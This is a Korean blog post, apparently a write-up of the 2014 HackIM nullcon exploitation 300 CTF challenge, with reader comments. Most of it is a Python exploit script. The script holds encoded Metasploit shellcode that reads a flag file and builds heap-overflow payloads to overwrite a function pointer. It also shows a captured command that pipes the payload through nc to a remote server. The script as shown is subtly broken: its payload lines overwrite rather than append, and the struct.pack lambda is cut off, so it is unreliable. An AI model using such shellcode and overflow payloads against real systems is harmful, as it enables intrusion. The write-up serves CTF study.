.

binary :

vuln3


import time

import struct


# createheap -> allocate_big_heap -> strcpy -> deleteheap(vtable)

# simple function pointer overwrite

# heap overflow


"""

/*

* linux/x86/read_file - 97 bytes

* http://www.metasploit.com

* Encoder: x86/shikata_ga_nai

* VERBOSE=false, PrependSetresuid=false,

* PrependSetreuid=false, PrependSetuid=false,

* PrependSetresgid=false, PrependSetregid=false,

* PrependSetgid=false, PrependChrootBreak=false,

* AppendExit=false, PATH=flag.txt, FD=4

*/

"""

shellcode = ("\xb8\xf6\x7e\xa8\x82\xdd\xc6\xd9\x74\x24\xf4\x5b\x2b\xc9\xb1"

"\x12\x31\x43\x14\x03\x43\x14\x83\xeb\xfc\x14\x8b\x43\xb4\x60"

"\x71\x94\xb9\x90\x21\xa5\x70\x5d\x55\x4c\x41\xe5\x55\x4f\x46"

"\x15\xd3\xa8\xcf\xec\x59\x36\xc0\x0e\x9e\xfa\x60\x87\x5c\xbc"

"\x65\x97\x60\xbd\xde\x93\x60\xbd\x20\x56\xe0\x05\x21\x68\xe1"

"\x75\x99\x68\xe1\x75\xdd\xa5\x61\x9d\x18\xca\x9d\xa1\xc5\x58"

"\x03\x39\x24\xd4\xbb\xb1\x38")



p = lambda x : struct.pack("


pr = 0x080487e8


def createheap():

# create heap

payload = "CR"

payload = "A"*38

payload = p(0x64)

payload = "\n"

return payload


def deleteheap():

# delete heap

#payload = "DE"

payload = "\xeb\x50" # short jump

payload = "\x90" * 38

payload = p(0x32)

payload = "\x90" * 0x50

payload = shellcode

payload = "\n"

return payload


def biggheap(size):

# allocate big heap

payload = "RE"

payload = "A" * 38

payload = p(0xc8)

payload = "A" * 36

payload = p(size)

payload = "\n"

payload = "B" * (size - 4 - 4)

payload = p(pr) # ret here

payload = "\n"

return payload


def overflow():

#lead to buffer overflow

payload = "CP"

payload = "A" * 38

payload = p(0x12c)

payload = "\n"

return payload


exploit = ""

exploit = createheap()

exploit = biggheap(0x110)

exploit = overflow()

exploit = deleteheap() # trig vuln


#print exploit


f = open("ex3.txt", "wb")

f.write(exploit)

f.close()


"""

root@ubuntu:/home/sweetchip/Desktop/cyber/ncon# (cat a.txt) | nc 23.23.190.205 8888

637c0c259175d230b08e3e589278ceeb

"""


바이너리를 분석하고 heap overflow를 유도시키고 function table을 덮어 씌우고 덮어씌운 주소를 호출하도록 유도하는


exploit 코드를 작성한다



flag : 637c0c259175d230b08e3e589278ceeb

'0x10 정보보안 > 0x15 System' 카테고리의 다른 글

HackIM nullcon exploitation 100 write-up [exploit]  (0) 2014.01.27
HackIM nullcon exploitation 400 write-up [exploit]  (5) 2014.01.27
HackIM nullcon exploitation 300 write-up  (4) 2014.01.27
HackIM nullcon exploiation 200 write-up [exploit]  (0) 2014.01.27
URLDownloadToFile Shellcode Analysis  (3) 2014.01.23
2013 Plaid CTF ropsaurusrex Exploit  (1) 2013.11.12
  1. Favicon of https://blackcon.tistory.com BlogIcon blackcon 2014.02.07 03:06 신고

    안녕하세요. 문제풀어보다가 막혀서 이렇게 댓글답니다 ㅎㅎ
    gdb를 이용해서 동적분석 하고싶은데 이런 문제는 어떻게 동적으로 붙여야 되죠?

    다른문제처럼 바이너리 내에 socket이 들어있지도 않아서 어떻게해야될지 ㅜㅜ
    답변 기다릴게요 :D

    # Delete Reply
    • p0p0pret 2014.02.07 03:41

      로컬에서 분석하시거나 리모트돌리실려면 http://research.hackerschool.org/Datas/Research_Lecture/remote1.txt 참고해주세영
      remote2.txt도 있습니다.

      # Delete
    • Favicon of https://blackcon.tistory.com BlogIcon blackcon 2014.02.07 03:47 신고

      이시간에 답변이라니....감사합니다 ^^

      # Delete
  2. 알 수 없는 사용자 2015.06.21 13:54

    안녕하세요. 이해가 안되는게 있어서 질문 드립니다.
    biggheap 에서 malloc(v8) 의 v8를 덮는 부분을 어떻게 구하신건지 궁금합니다. IDA로 계속 살펴봐도 저 v8 덮는 부분을 어떻게 구하는건지 모르겠네요..

    # Delete Reply

+ Recent posts